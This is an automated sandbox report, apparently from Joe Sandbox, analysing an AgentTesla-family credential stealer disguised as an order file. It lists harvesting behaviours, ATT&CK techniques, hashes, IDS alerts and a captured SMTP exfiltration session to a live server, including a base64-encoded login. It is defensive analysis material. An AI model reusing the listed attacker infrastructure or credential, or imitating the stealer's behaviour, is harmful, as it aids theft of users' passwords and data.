                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe | File opened: C:\FTP Navigator\Ftplist.txt
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                        Source: Yara match | File source: 00000005.00000002.2905038066.0000000003001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: Process Memory Space: ORDER#023_2024.exe PID: 4268, type: MEMORYSTR
                        Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR

                        Remote Access Functionality

                        Source: Yara match | File source: 5.2.ORDER#023_2024.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0.2.ORDER#023_2024.exe.3c384f0.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0.2.ORDER#023_2024.exe.3c61510.1.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0.2.ORDER#023_2024.exe.3c61510.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0.2.ORDER#023_2024.exe.3c384f0.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 00000005.00000002.2903371766.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000000.00000002.1681703639.0000000003BC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: dump.pcap, type: PCAP
                        Source: Yara match | File source: 00000005.00000002.2905038066.000000000305A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000005.00000002.2905038066.0000000003001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: Process Memory Space: ORDER#023_2024.exe PID: 4268, type: MEMORYSTR
                        Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
                        MITRE ATT&CK Matrix (techniques listed per tactic; a number preceding a technique is the count badge shown in the matrix for that technique)

                        Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
                        Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
                        Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
                        Execution: 121 Windows Management Instrumentation; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
                        Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
                        Privilege Escalation: 111 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
                        Defense Evasion: 1 Masquerading; 11 Disable or Modify Tools; 141 Virtualization/Sandbox Evasion; 111 Process Injection; 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 12 Software Packing; 1 DLL Side-Loading
                        Credential Access: 2 OS Credential Dumping; 1 Credentials in Registry; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
                        Discovery: 111 Security Software Discovery; 1 Process Discovery; 141 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 File and Directory Discovery; 24 System Information Discovery; Remote System Discovery; System Owner/User Discovery
                        Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
                        Collection: 1 Email Collection; 11 Archive Collected Data; 2 Data from Local System; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
                        Command and Control: 1 Encrypted Channel; 1 Non-Standard Port; 1 Non-Application Layer Protocol; 11 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
                        Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
                        Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
                        Behavior Graph (ID: 1568740, Sample: ORDER#023_2024.exe, Startdate: 04/12/2024, Architecture: WINDOWS, Score: 100)

                        Start
                          DNS/IP: mail.mbarieservicesltd.com
                          Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Multi AV Scanner detection for submitted file; 8 other signatures
                          Started: ORDER#023_2024.exe

                        ORDER#023_2024.exe
                          Dropped file: C:\Users\user\...\ORDER#023_2024.exe.log, ASCII
                          Signatures: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Adds a directory exclusion to Windows Defender; Injects a PE file into a foreign processes
                          Started: ORDER#023_2024.exe (child 1); powershell.exe; ORDER#023_2024.exe (child 2)

                        ORDER#023_2024.exe (child 1)
                          DNS/IP: mail.mbarieservicesltd.com 199.79.62.115, 49734, 587 PUBLIC-DOMAIN-REGISTRYUS United States
                          Signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal ftp login credentials; Tries to harvest and steal browser information (history, passwords, etc)

                        powershell.exe
                          Signatures: Loading BitLocker PowerShell Module
                          Started: WmiPrvSE.exe; conhost.exe

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Source | Detection | Scanner | Label
                        ORDER#023_2024.exe | 66% | ReversingLabs | Win32.Trojan.AgentTesla
                        ORDER#023_2024.exe | 100% | Joe Sandbox ML |
                        No Antivirus matches (three further categories)

                        Source | Detection | Scanner | Label
                        http://www.carterandcone.coml | 0% | Avira URL Cloud | safe
                        http://www.fontbureau.com | 0% | Avira URL Cloud | safe
                        http://www.zhongyicts.com.cn | 0% | Avira URL Cloud | safe
                        http://www.fontbureau.com/designers | 0% | Avira URL Cloud | safe
                        http://www.tiro.com | 0% | Avira URL Cloud | safe
                        http://www.urwpp.deDPlease | 0% | Avira URL Cloud | safe
                        Domains

                        Name | IP | Active | Malicious | Antivirus Detection | Reputation
                        mail.mbarieservicesltd.com | 199.79.62.115 | true | false | | high
                        URLs

                        Name | Source | Malicious | Antivirus Detection | Reputation
                        http://www.apache.org/licenses/LICENSE-2.0 | ORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp | false | | high
                        http://www.fontbureau.com | ORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                        http://www.fontbureau.com/designersG | ORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp | false | | high
                        http://www.fontbureau.com/designers/? | ORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp | false | | high
                        http://www.founder.com.cn/cn/bThe | ORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp | false | | high
                        http://www.fontbureau.com/designers? | ORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp | false | | high
                        http://www.tiro.com | ORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                        http://www.fontbureau.com/designers | ORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                        http://www.goodfont.co.kr | ORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp | false | | high
                        http://www.carterandcone.coml | ORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                        http://www.sajatypeworks.com | ORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp | false | | high
                        http://www.typography.netD | ORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp | false | | high
                        http://www.fontbureau.com/designers/cabarga.htmlN | ORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp | false | | high
                        http://www.founder.com.cn/cn/cThe | ORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp | false | | high
                        http://www.galapagosdesign.com/staff/dennis.htm | ORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp | false | | high
                        http://www.founder.com.cn/cn | ORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp | false | | high
                        http://www.fontbureau.com/designers/frere-user.html | ORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp | false | | high
                        http://www.jiyu-kobo.co.jp/ | ORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp | false | | high
                        http://www.galapagosdesign.com/DPlease | ORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp | false | | high
                        http://www.fontbureau.com/designers8 | ORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp | false | | high
                        http://localhost/arkanoid_server/requests.php | ORDER#023_2024.exe | false | | high
                        http://www.fonts.com | ORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp | false | | high
                        http://www.sandoll.co.kr | ORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp | false | | high
                        http://www.urwpp.deDPlease | ORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                        http://www.zhongyicts.com.cn | ORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | ORDER#023_2024.exe, 00000000.00000002.1679554005.0000000002B81000.00000004.00000800.00020000.00000000.sdmp | false | | high
                        http://www.sakkal.com | ORDER#023_2024.exe, 00000000.00000002.1691799925.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp | false | | high
                        http://mail.mbarieservicesltd.com | ORDER#023_2024.exe, 00000005.00000002.2905038066.000000000305A000.00000004.00000800.00020000.00000000.sdmp | false | | high
                        Contacted IPs

                        IP | Domain | Country | ASN | ASN Name | Malicious
                        199.79.62.115 | mail.mbarieservicesltd.com | United States | 394695 | PUBLIC-DOMAIN-REGISTRYUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1568740
Start date and time: 2024-12-04 22:01:07 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 12s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 11
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: ORDER#023_2024.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@9/6@3/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 40
• Number of non-executed functions: 11
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: ORDER#023_2024.exe
Time | Type | Description
16:01:56 | API Interceptor | 58x Sleep call for process: ORDER#023_2024.exe modified
16:01:58 | API Interceptor | 18x Sleep call for process: powershell.exe modified
Match: 199.79.62.115
Associated Sample Name / URL | Detection | Threat Name
QFEWElNtpn.exe | malicious | AgentTesla
SoA_14000048_002.exe | malicious | AgentTesla
Quote 000002320.exe | malicious | AgentTesla
LPO-2024-357.exe | malicious | AgentTesla, PureLog Stealer
Quote5000AFC.exe | malicious | AgentTesla, PureLog Stealer, zgRAT
Quote1000AFC.exe | malicious | AgentTesla, PureLog Stealer, zgRAT
Quote 40240333-REV2.exe | malicious | AgentTesla
PO ALJAT-5804-2024.exe | malicious | AgentTesla
INQ#84790.exe | malicious | AgentTesla
LPO24.0524.exe | malicious | AgentTesla
Match: mail.mbarieservicesltd.com
Associated Sample Name / URL | Detection | Threat Name | Context
QFEWElNtpn.exe | malicious | AgentTesla | 199.79.62.115
SoA_14000048_002.exe | malicious | AgentTesla | 199.79.62.115
Quote 000002320.exe | malicious | AgentTesla | 199.79.62.115
LPO-2024-357.exe | malicious | AgentTesla, PureLog Stealer | 199.79.62.115
Quote5000AFC.exe | malicious | AgentTesla, PureLog Stealer, zgRAT | 199.79.62.115
Quote1000AFC.exe | malicious | AgentTesla, PureLog Stealer, zgRAT | 199.79.62.115
Quote 40240333-REV2.exe | malicious | AgentTesla | 199.79.62.115
PO ALJAT-5804-2024.exe | malicious | AgentTesla | 199.79.62.115
INQ#84790.exe | malicious | AgentTesla | 199.79.62.115
Match: PUBLIC-DOMAIN-REGISTRYUS
Associated Sample Name / URL | Detection | Threat Name | Context
QFEWElNtpn.exe | malicious | AgentTesla | 199.79.62.115
SoA_14000048_002.exe | malicious | AgentTesla | 199.79.62.115
Quote 000002320.exe | malicious | AgentTesla | 199.79.62.115
new booking 9086432659087.exe | malicious | AgentTesla, PureLog Stealer | 162.251.80.30
rAttached_updat.vbs | malicious | GuLoader, Remcos | 103.76.231.42
LPO-2024-357.exe | malicious | AgentTesla, PureLog Stealer | 199.79.62.115
RFQ.exe | malicious | AgentTesla, PureLog Stealer | 162.251.80.30
Quote5000AFC.exe | malicious | AgentTesla, PureLog Stealer, zgRAT | 199.79.62.115
Quote1000AFC.exe | malicious | AgentTesla, PureLog Stealer, zgRAT | 199.79.62.115
shipping doc -GY298035826.exe | malicious | AgentTesla, PureLog Stealer | 162.251.80.30
No context
No context
Process: C:\Users\user\Desktop\ORDER#023_2024.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1216
Entropy (8bit): 5.34331486778365
Encrypted: false
SSDEEP: 24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5: 1330C80CAAC9A0FB172F202485E9B1E8
SHA1: 86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256: B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512: 75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious: true
Reputation: high, very likely benign file
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 2232
Entropy (8bit): 5.379401388151058
Encrypted: false
SSDEEP: 48:fWSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMuge//ZmUyus:fLHxvIIwLgZ2KRHWLOuggs
MD5: 1F07DBFC960DDEA7295F1A6FD48057B1
SHA1: 05F3052BCC168B834CEA8EA48E050020C5CAD8F5
SHA-256: 72F8629C56744FE3E1E3C1B705EF6355E59E5C96B4924427EE430C9F9EF46809
SHA-512: D94DF9A81FAF494891837FA73FECEF1D8226E18978A2EEA534409724409E13C6DACAB32E00C494FB2A140573E1C152EE407A0E070515B3802A06649690B1C491
Malicious: false
Reputation: moderate, very likely benign file
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Reputation: high, very likely benign file
Preview: # PowerShell test file to determine AppLocker lockdown mode
File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 7.757710857487303
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.83%
• Win32 Executable (generic) a (10002005/4) 49.78%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Win16/32 Executable Delphi generic (2074/23) 0.01%
• Generic Win/DOS Executable (2004/3) 0.01%
File name: ORDER#023_2024.exe
File size: 642'048 bytes
MD5: cb93d77357df18ffb788e73e7f9e8ba1
SHA1: 0fa0e09a4905239dca028b58a0e6523e8c91498c
SHA256: 3591cadebdbbaee9e75158d085435cf81ba8cdfc5c92b050275f9b490ee60998
SHA512: 3cf47d515a029681d551d23de1743835cf4dc94df275a6cd4c341c2bbc61837167068fc4e228b7b312d5d78b663587cdf7a45174df111e0ab0546294f7da34ef
SSDEEP: 12288:nIR4R52J+XtwoX4D7JtUb4KREvG/4vou+bQy91bDVus1Bja5ickMIR:nIeeTooJtUsKi+QoLh9p5Y5icTI
TLSH: 6BD402481E49E812C95163340FB2F6B8117C6FDEE90193235FEE6EEFF86A9244C492D1
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....qNg..............0..t...T........... ........@.. ....................... ............@................................
Icon Hash: 033424c4c199d839
Entrypoint: 0x4991fa
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp: 0x674E7119 [Tue Dec 3 02:46:49 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744
Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al (repeated 46 times: zero-byte padding following the CLR entry stub)
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x991a8 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x9a000 | 0x4ca8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xa0000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | 
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x97200 | 0x97400 | a87cb48f4d56db3267b072228892c834 | False | 0.9267997804752066 | data | 7.767634101805021 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x9a000 | 0x4ca8 | 0x5000 | 7b6db1034c49ef61784ac56eacc4d534 | False | 0.9177734375 | data | 7.667114653481911 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xa0000 | 0xc | 0x400 | 8f06266fd3c5c9f07f6bf8fbfcbf5ffe | False | 0.025390625 | data | 0.05585530805374581 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x9a100 | 0x46f9 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced |  |  | 0.9932852661126094
RT_GROUP_ICON | 0x9e80c | 0x14 | data |  |  | 1.05
RT_VERSION | 0x9e830 | 0x278 | data |  |  | 0.4699367088607595
RT_MANIFEST | 0x9eab8 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators |  |  | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-04T22:02:06.918218+0100 | 2855245 | ETPRO MALWARE Agent Tesla Exfil via SMTP | 1 | 192.168.2.4 | 49734 | 199.79.62.115 | 587 | TCP
2024-12-04T22:02:06.918218+0100 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.4 | 49734 | 199.79.62.115 | 587 | TCP
2024-12-04T22:03:40.849487+0100 | 2030171 | ET MALWARE AgentTesla Exfil Via SMTP | 1 | 192.168.2.4 | 49734 | 199.79.62.115 | 587 | TCP
2024-12-04T22:03:40.849487+0100 | 2839723 | ETPRO MALWARE Win32/Agent Tesla SMTP Activity | 1 | 192.168.2.4 | 49734 | 199.79.62.115 | 587 | TCP
2024-12-04T22:03:40.849487+0100 | 2840032 | ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 | 1 | 192.168.2.4 | 49734 | 199.79.62.115 | 587 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 4, 2024 22:02:00.250247002 CET | 54317 | 53 | 192.168.2.4 | 1.1.1.1
Dec 4, 2024 22:02:01.242022038 CET | 54317 | 53 | 192.168.2.4 | 1.1.1.1
Dec 4, 2024 22:02:02.238636017 CET | 54317 | 53 | 192.168.2.4 | 1.1.1.1
Dec 4, 2024 22:02:03.119982958 CET | 53 | 54317 | 1.1.1.1 | 192.168.2.4
Dec 4, 2024 22:02:03.119997978 CET | 53 | 54317 | 1.1.1.1 | 192.168.2.4
Dec 4, 2024 22:02:05.029109001 CET | 53 | 54317 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 4, 2024 22:02:00.250247002 CET | 192.168.2.4 | 1.1.1.1 | 0x23ce | Standard query (0) | mail.mbarieservicesltd.com | A (IP address) | IN (0x0001) | false
Dec 4, 2024 22:02:01.242022038 CET | 192.168.2.4 | 1.1.1.1 | 0x23ce | Standard query (0) | mail.mbarieservicesltd.com | A (IP address) | IN (0x0001) | false
Dec 4, 2024 22:02:02.238636017 CET | 192.168.2.4 | 1.1.1.1 | 0x23ce | Standard query (0) | mail.mbarieservicesltd.com | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 4, 2024 22:02:03.119982958 CET | 1.1.1.1 | 192.168.2.4 | 0x23ce | No error (0) | mail.mbarieservicesltd.com |  | 199.79.62.115 | A (IP address) | IN (0x0001) | false
Dec 4, 2024 22:02:03.119997978 CET | 1.1.1.1 | 192.168.2.4 | 0x23ce | No error (0) | mail.mbarieservicesltd.com |  | 199.79.62.115 | A (IP address) | IN (0x0001) | false
Dec 4, 2024 22:02:05.029109001 CET | 1.1.1.1 | 192.168.2.4 | 0x23ce | No error (0) | mail.mbarieservicesltd.com |  | 199.79.62.115 | A (IP address) | IN (0x0001) | false
Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
Dec 4, 2024 22:02:04.469135046 CET | 587 | 49734 | 199.79.62.115 | 192.168.2.4 | 220-md-54.webhostbox.net ESMTP Exim 4.96.2 #2 Thu, 05 Dec 2024 02:32:04 +0530
    220-We do not authorize the use of this system to transport unsolicited,
    220 and/or bulk e-mail.
Dec 4, 2024 22:02:04.472465992 CET | 49734 | 587 | 192.168.2.4 | 199.79.62.115 | EHLO 585948
Dec 4, 2024 22:02:04.849436998 CET | 587 | 49734 | 199.79.62.115 | 192.168.2.4 | 250-md-54.webhostbox.net Hello 585948 [8.46.123.228]
    250-SIZE 52428800
    250-8BITMIME
    250-PIPELINING
    250-PIPECONNECT
    250-AUTH PLAIN LOGIN
    250-STARTTLS
    250 HELP
Dec 4, 2024 22:02:04.850497961 CET | 49734 | 587 | 192.168.2.4 | 199.79.62.115 | AUTH login c2FsZXNzQG1iYXJpZXNlcnZpY2VzbHRkLmNvbQ==
